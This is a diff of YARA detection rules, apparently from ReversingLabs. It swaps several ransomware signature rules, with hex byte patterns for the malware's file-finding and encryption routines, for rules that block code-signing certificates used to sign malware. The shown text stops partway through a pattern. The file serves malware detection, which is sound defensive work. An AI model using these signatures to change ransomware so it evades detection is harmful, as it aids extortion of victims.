+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "13:80:a7:cc:f2:bf:36:bc:49:6b:00:d8" and 1478069976 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Garrantydecrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_02Eaf27E6F1575E365Fc7Fe4E0Be43F7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GarrantyDecrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0aa05f06-1773-5ce8-892d-04468f5deccc"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "5d1aad80-9444-5cc3-8ff4-b70fb089cda0"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.GarrantyDecrypt.yara#L1-L79"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16492-L16508"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7194c1e0e15a89f2c691a7d586b9db68295cc52a5f042d0f7eb558c326430444"
+		logic_hash = "333a43bdfbc400727b8eae1efeb03484b959fc45ed6b8b0dd5e6a553fa27e87f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GarrantyDecrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 8D 45 ?? 50 89 5D ?? FF D6 85 C0 75
-            ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 45 ?? 50 FF D6 85 C0 74 ?? 8B 45 ?? A3 ?? ?? ?? ??
-            3B C3 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 3B F3 0F 84 ?? ?? ?? ?? 8B 7E ?? 8B 46
-            ?? 33 C9 3B FB 76 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 29 45 ?? 8B 55 ?? 8D 84 0D ?? ?? ??
-            ?? 8A 14 02 41 88 10 3B CF 72 ?? 68 ?? ?? ?? ?? 53 53 FF 76 ?? FF 36 FF 35 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 3B FB 74 ?? 8B 46 ?? 68 ?? ?? ?? ?? 89 45
-            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B
-            45 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 36 E8
-            ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 53 FF
-            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 50 6A ?? 5F 57 FF 35 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 E8 ?? ?? ?? ?? 8B C8 33 DB 89 4D ?? 3B
-            CB 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 7D ?? 8B F1 2B C1 8A 14 30 88 16 46 4F 75 ?? 6A ??
-            8D 45 ?? 50 51 53 6A ?? 53 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 53 68 ?? ??
-            ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ??
-            ?? ?? ?? 89 5D ?? 89 5D ?? 8B 3D ?? ?? ?? ?? 56 FF D7 8D 04 46 83 E8 ?? 66 83 38 ??
-            75 ?? 8B 4D ?? FF B1 ?? ?? ?? ?? 2B C6 83 C0 ?? D1 F8 8D 04 46 50 FF 15 ?? ?? ?? ??
-            3B C3 74 ?? 50 FF D7 8B 4D ?? FF B1 ?? ?? ?? ?? 89 45 ?? FF D7 39 45 ?? 74 ?? 83 45
-            ?? ?? 83 7D ?? ?? 72 ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            3D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68
-            ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 33 C0 89 5D ?? 3B
-            C3 72 ?? 77 ?? 39 5D ?? 76 ?? 8B 45 ?? 8B C8 81 E1 ?? ?? ?? ?? 79 ?? 49 83 C9 ?? 41
-            89 4D ?? 75 ?? 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50 8D 85 ?? ?? ?? ?? 50 8D 45 ?? E8
-            ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 55 ?? 8B 45 ?? 8A 8C 0D ?? ?? ?? ?? 30 0C 10 FF 45
-            ?? 8B 45 ?? 99 33 C9 3B D1 72 ?? 77 ?? 3B 45 ?? 72 ?? 8B 45 ?? 6A ?? F7 D8 99 53 52
-            50 FF 75 ?? FF D7 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF D6 39 5D ?? 74 ?? 81
-            7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50
-            FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D7 53 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF D6
-            53 8D 45 ?? 50 6A ?? FF 75 ?? FF 75 ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B F0 3B F3 74 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            59 FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
-        }
-		$find_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? 85
-            DB 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53
-            FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ??
-            ?? ?? ?? BB ?? ?? ?? ?? 83 65 ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 72 ?? 8D 85 ?? ??
-            ?? ?? 50 FF 75 ?? 53 57 FF 75 ?? FF D6 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? FF 75
-            ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 53 57 FF 75 ?? FF D6 83
-            C4 ?? 33 F6 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? 8B D8 83 FB ?? 74 ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 BF ?? ?? ?? ?? 57 FF D6 50
-            57 8B 3D ?? ?? ?? ?? 53 FF D7 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? FF D6 50 FF 35 ??
-            ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Theravada Solutions Ltd" and pe.signatures [ i ] . serial == "02:ea:f2:7e:6f:15:75:e3:65:fc:7f:e4:e0:be:43:f7" and 1562889600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostbin : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6Eb02Ac2Beb9611Ed57Eb12E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ghostbin ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4d576854-7a30-527d-9a7a-f22018183540"
-		date = "2021-09-06"
-		modified = "2021-09-06"
+		id = "64350364-fe74-54df-886d-1197146e00e7"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Ghostbin.yara#L1-L61"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16510-L16526"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3881e1c83ac2a31fdd8a081d3e6e6ea759771dbc183c3af9528930619bcddf9e"
+		logic_hash = "7f2a6c61ae82fec6829924d11190da776aebdd3d72c7e001fdc29b215649261c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ghostbin"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$setup_env = {
-            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C
-            08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 18 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16
-            28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 19 FE 01 08 6F ?? ?? ?? ?? 18 FE 01 60 2C ?? 08
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 17 D6 0B 07 06 8E 69 32 ?? 00 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 2C ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F ?? 16 28 ?? ?? ?? ?? 26 DE ?? 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? DE ?? 2A
-        }
-		$encrypt_files = {
-            73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 25 6F ?? ?? ?? ?? 25 06 28 ?? ?? ?? ?? 03 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 0C 6F ?? ?? ??
-            ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 0B 07 8E 69 17 59 1F ?? 58 17 58 8D ?? ?? ?? ?? 0D 08
-            09 1F ?? 28 ?? ?? ?? ?? 07 16 09 1F ?? 07 8E 69 28 ?? ?? ?? ?? 09 2A
-        }
-		$find_files = {
-            02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 16 0B
-            2B ?? 06 07 9A 0C 7E ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 08 28 ?? ?? ??
-            ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ??
-            ?? ?? ?? 08 28 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? DE ?? 07 17 D6 0B
-            07 06 8E 69 32 ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ??
-            11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ??
-            DE ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\xA8\\xE5\\x87\\x8C\\xE4\\xBC\\xAF\\xE4\\xB9\\x90\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "6e:b0:2a:c2:be:b9:61:1e:d5:7e:b1:2e" and 1585023767 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Delphimorix : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_010000000001297Dba69Dd : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Delphimorix ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1f964601-9819-5597-ba6e-db3a30e3aa5a"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "f6a63e79-4dde-590f-ad65-ba9cc29ff48c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Delphimorix.yara#L1-L67"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16528-L16544"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6d401d488d57b2d75e93a1dfd47ece687a5791d1f0a52768300f4af8a8787212"
+		logic_hash = "bbc3e740d5043d1811ff44c7366c69192fb78c95215b30fd4f4c782812ad591c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Delphimorix"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55
-            68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B
-            4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ??
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B C3
-            8B 10 FF 12 52 50 B9 ?? ?? ?? ?? 8B D3 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B
-            C6 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3
-        }
-		$find_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
-            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02
-            ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85
-        }
-		$find_files_p2 = {
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
-            C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 75 ?? 68 ?? ?? ??
-            ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ROSSO INDEX K.K." and pe.signatures [ i ] . serial == "01:00:00:00:00:01:29:7d:ba:69:dd" and 1277713154 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Encoded01 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7Def22Ef4C645B1Decfb36B6D3539Dbf : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Encoded01 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "923d987e-f888-5b6a-9ebd-ee1257124aed"
-		date = "2021-12-16"
-		modified = "2021-12-16"
+		id = "aeb10a64-633c-5fc6-87af-360e1a402ad4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Encoded01.yara#L1-L141"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16546-L16562"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f6f872290f15f4c564911bb099824c47cb13164457e1bcdb02dee441bc2d6b6a"
+		logic_hash = "655ed87ee65f937c7cec95085fe612f8d733e0853c87aa50b4aa1fda9e5f7a5d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Encoded01"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 89 4D ?? 89 55
-            ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 55 ?? 66 83 7C 42 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ??
-            ?? ?? ?? 8B 7D ?? 4F 85 FF 0F 8C ?? ?? ?? ?? 47 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ??
-            ?? ?? ?? 8B 45 ?? 8B 55 ?? FF 34 90 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ??
-            33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D
-            95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ??
-            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
-            8B 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84
-        }
-		$find_files_p2 = {
-            C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A1
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 6A ?? 68 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 8B 00 E8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 3B 55 ?? 75 ?? 3B 45 ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 83 7D ?? ??
-            75 ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 73 ??
-            8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 0F 84 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ??
-            ?? ?? ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ??
-            ?? 33 D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 74
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ?? ?? ??
-            ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 33
-            D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ??
